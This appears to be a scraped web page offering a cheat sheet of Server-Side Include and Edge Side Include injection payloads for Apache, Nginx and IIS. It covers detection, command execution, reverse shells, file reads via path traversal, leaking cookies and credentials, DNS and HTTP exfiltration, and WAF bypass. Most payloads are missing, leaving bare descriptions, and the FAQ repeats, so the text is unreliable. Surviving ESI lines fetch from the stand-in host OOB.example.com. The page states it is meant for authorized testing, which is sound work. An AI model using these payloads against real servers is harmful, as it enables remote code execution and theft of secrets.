SSI Injection Cheat Sheet

Server-Side Includes (SSI) injection payloads for command execution, file reading, environment disclosure, and detection across Apache, Nginx, and IIS. (45 payloads)

Try it interactively with the SSTI Identifier & Payload Builder

Detection

(8)

Returns server date/time if SSI is parsed — clean low-noise probeApache/IIS

Dumps all SSI/CGI environment variables — strong positive signalApache

Reflects the current document filename when SSI executesApache/IIS

Leaks web server banner (e.g. Apache/2.4.x) via SSIBoth

Custom error string proves the directive was interpreted (blind detect)Apache

Set then echo — output of 1 confirms parsing without side effectsApache

[an error occurred while processing this directive]

Default Apache mod_include error text — seeing it means SSI ran but failedIndicator

xx

Reflects your User-Agent header — detect SSI in a stored/log contextApache

Command Execution (#exec)

(8)

Run shell command via mod_include — needs Options +Includes (not IncludesNOEXEC)Apache/Linux

Identify the web server's running userBoth

List root directory contentsLinux

Directory listing on Windows/IIS hostsIIS/Windows

Read sensitive file through the shell instead of #includeLinux

Invoke a CGI program — works even when cmd is restricted but cgi allowedApache

Spawn a reverse shell to your listenerLinux

Chain commands with ; for quick host fingerprintingLinux

File Read & Include (#include)

(8)

Include file by URI path — server-relative, must be web-accessibleApache

Include a file relative to the current document (no leading slash, same dir)Apache

Path traversal via the file attribute to escape the doc rootLinux

Include CGI output — runs the script and embeds its responseApache

Pull mod_status internals if exposed on the same vhostApache

Some mod_include setups treat absolute URLs as a subrequest — possible SSRFApache

Confirm a file exists and leak its size when read is blockedApache

Disclose a file's last-modified timestamp — enumeration primitiveApache

Environment & Variable Disclosure

(7)

Reveal the absolute web root path — aids traversal/upload chainingApache

Absolute path of the executing script on diskApache

Echo the requester IP — confirms dynamic, request-scoped executionBoth

Reflect the raw (un-decoded) query string back into the pageApache

Disclose cookies sent on the request — session/CSRF token leakageApache

Full process environment via shell — often holds DB creds and API keysLinux

Dump Windows environment variables on IIS hostsIIS/Windows

Blind & Out-of-Band

(6)

Time-based detection when output is suppressed — page stalls ~10sLinux

ICMP callback to confirm blind command executionLinux

DNS exfiltration of command output via a subdomain labelLinux

HTTP callback that exfiltrates base64-encoded output to your collaboratorLinux

OOB include — server-side fetch proves SSI parsing without reflectionApache

Windows OOB callback to validate blind exec on IISIIS/Windows

Injection Points & Filter Bypass

(8)

Hostname: 

Stored SSI — inject directive into a field later rendered by an .shtml pageStored

User-Agent: 

Inject via a logged header where logs are served through SSI parsingLog-based

shell.shtml

Upload an .shtml/.shtm/.stm file so the server parses your SSI directivesFile upload

Hex-escaped keyword char to slip past naive 'exec' string filtersBypass

URL-encode the # so the WAF misses the directive prefix before decodeBypass

Use tabs instead of spaces as directive whitespace to evade signaturesBypass

<esi:include src="http://OOB.example.com/"/>

Edge Side Includes — SSI's CDN/cache cousin; abuse Akamai/Varnish/Fastly ESIESI

<esi:include src="/" stylesheet="http://OOB.example.com/x.xsl"/>

ESI + XSLT (ESI+XML) for RCE/file-read on engines that support stylesheetsESI

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Command Injection Cheat Sheet LFI / Path Traversal Cheat Sheet SSTI Cheat Sheet Web Shell Cheat Sheet

Frequently asked questions

What is the SSI Injection Cheat Sheet?+

It's a quick-reference collection of 45 SSI Injection payloads for testing SSI Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these SSI Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these SSI Injection payloads free to use?+

Yes — this cheat sheet and all SSI Injection payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the SSI Injection Cheat Sheet?+

How do I use these SSI Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these SSI Injection payloads free to use?+

Yes — this cheat sheet and all SSI Injection payloads are completely free, with no account required. Everything runs in your browser.

SSI Injection Cheat Sheet

Detection

Command Execution (#exec)

File Read & Include (#include)

Environment & Variable Disclosure

Blind & Out-of-Band

Injection Points & Filter Bypass

Related Tools

Related Cheat Sheets

Frequently asked questions

SSI Injection Cheat Sheet

Detection

Command Execution (#exec)

File Read & Include (#include)

Environment & Variable Disclosure

Blind & Out-of-Band

Injection Points & Filter Bypass

Related Tools

Related Cheat Sheets

Frequently asked questions